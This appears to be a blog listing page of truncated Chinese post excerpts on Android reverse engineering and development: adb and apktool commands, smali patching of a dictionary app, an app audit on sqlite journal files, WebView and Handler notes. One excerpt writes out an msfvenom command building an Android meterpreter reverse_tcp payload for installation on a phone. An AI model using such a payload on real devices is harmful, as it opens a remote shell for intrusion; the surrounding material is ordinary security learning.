公众号shadow sock7

参考：https://www.jianshu.com/p/cef44295a7feadb rootadb remountadb pull /system/etc/hosts然后本地编辑hosts，记住：最后一行要空出来一行。最后，将hosts文件push回去adb push hosts /system/etc/hosts验证hosts文件是否已被修改：cat /system/etc/hosts验证hosts是否已生效。...

两年前逆向了youdaodict，注释掉了关键Activity的smali中的三行代码使得三个Tab不能加载，于是只使用其『词典』功能。 修改前(official)[~/GitProjects/android_re/repos/youdaodict]$ md5 youdaodict_official.apk [3:43:01]MD5 (youdaodi

http://blog.csdn.net/guolin_blog/article/details/38461239

查看某app的签名版本adb shell pm dump com.example|grep apkSigningVersion命令行查看系统版本号adb shell getprop ro.build.version.release根据界面元素id定位代码uiautomatorviewer获取机器wlan0无限网卡的MAC地址：adb sh

原文：https://testerhome.com/topics/12075?locale=zh-TW

先生成一个payload，带上meterpreter监听的地址和端口：msfvenom -p android/meterpreter/reverse_tcp LHOST=<your public IP> LPORT=80 -o msf.apk由于大号端口在我的wifi环境下无法出去，所以这里我设置为80端口。然后安装这个apk到手机。然后在msf上：use exploit/...

原文：真的安全吗之51信用卡管家Android客户端审计报告 1.讲这个漏洞先要介绍一下一个安卓系统特性:db-journal 文件是 sqlite 的一个临时的日志文件,主 要用于 sqlite 事务回滚机制,在事务开始时产生,在事务结束时删除;当程序发生崩溃或者系统断 电时该文件将留在磁盘上,以便下次程序运行时进行事务回滚,其内容与同名的.db 文件相同。在 android 系统中,.d...

https://github.com/caiqiqi/AndroBugs

#先用apktool反编译,不反编译源码和资源文件节省时间apktool d test.apk -o test--no-res --no-srccd test# 如果有三个dex文件，classes.dex,classes2.dex，classes3.dex，删除第一个和第三个，将第二个重命名为classes.dexrm -rf classes.dex classes3.dexmv cl...

https://blog.csdn.net/qq_36658099/article/details/81487491https://blog.csdn.net/susu_xi/article/details/86247295

Android Application Diffing: Engine Overview讲Quarkslab 背后的设计理念。第二篇通过一个漏洞CVE-2019-10875来展现工具的功能。第三篇通过https://blog.quarkslab.com/android-application-diffing-analysis-of-modded-version.html...

参考： http://www.jianshu.com/p/f45cfd9fccaaDemo修改后的apk这是我很久以前忘了用什么工具对youdaodict逆向之后，注释掉两行smali之后重打包的apk。近几个月这个应用一启动不久就崩溃了，我还以为是签名时间到了，结果发现并没有到，应该是其他的什么原因。等待动态调试之。[~/GitProjects/android_re/repos/youdaodi

$ grep -rn "android.intent.action.MAIN" -B 3 -C 2 AndroidManifest.xmlAndroidManifest.xml-43- <activity android:name="com.youdao.dict.activity.DictSplashActivity" android:screenOrientation="port

对于不太熟悉汇编指令的同学，初次接触IDA的时候被IDA反编译出来的汇编指令吓到了，殊不知IDA其实是可以打开自动显示注释的选项的。通过Option->General->Auto Comments即可。显示注释前打开显示注释选项显示注释后

摘要使用Gradle和它推荐的工程目录使用 Maven依赖而不是导入jar包把密码和敏感数据放在gradle.properties使用Fragment来呈现UI视图使用Activity只是用来管理Fragment的使用多个style文件以避免单一的大style文件使用WebView时避免在客户端做处理HTML工作，当心内存泄露总是用ProGuard和DexGuard来混淆项目不要自

Fragments make implementing this functionality easy. The list of emails would exist in one fragment, and the detail view for an email would exist in another fragment. Depending on the device size, our

在Github上：https://github.com/caiqiqi/Notes/blob/master/%E5%9C%A8Activity%E4%B8%AD%E5%88%9B%E5%BB%BAHandler%E5%8F%91%E9%80%81%E6%B6%88%E6%81%AF%E4%BB%A5%E5%8F%8A%E6%8E%A5%E5%8F%97%E6%B6%88%E6%81%AF%E8%BF

原文链接 http://source.android.com/source/code-style.html译文(部分)开发者编码风格以上的编码风格都是很严格的规则，而不只是指导建议。一般来说，不按这些规矩来编码的话，Android是不接受这样的代码的。我们已经发现了现在的这些代码并不是完全按这些规则来的，但是我们还是希望以后的代码可以遵守这些规则。跟Java语言相关的规则Android遵循标准的Ja

Android提供了WebView组件(相关类为android.webkit.WebView、android.webkit.WebViewClient)。表面上来看，这个组件与普通的ImageView差不多，但实际上，这个组件的功能要强大得多，WebView本身就是一个浏览器实现！它的内核基于WebKit引擎（怪不得包名是webkit）。如果我们队WebView进行一些美化，包装，可以非常轻松地开发

MessageQueue对外提供插入和删除的工作，但是只是消息的存储单元，并不能处理消息。Looper—-android.os.looperLooper填补了MessageQueue不能处理消息的缺陷，主要用Looper.loop()方法来死循环查找是否有新消息，如果有，就交给Handler去处理；若没有，则一直等待着。唯一跳出循环的方式是在当MessageQueue.next()方法返回null的

public class MyActivity extends ActionBarActivity { @Override public boolean onSupportNavigateUp() { if(getSupportFragmentManager().getBackStackEntryCount() > 0 ) { getSupp

昨天碰到一个怪事，我转发了一条微博之后，当我在不同终端上访问同一个链接的时候， 居然打开的不是同一个链接。电脑网页版和一加2打开的链接是可以打开的（http://blog.sycsec.com/?p=1005）GET /?p=1005 HTTP/1.1Host: blog.sycsec.comProxy-Connection: keep-aliveAccept: text/html,

SYNTAX: <uses-sdk android:minSdkVersion="integer" android:targetSdkVersion="integer" android:maxSdkVersion="integer" />ATTRIBUTES: android:minSdkVersion An integer de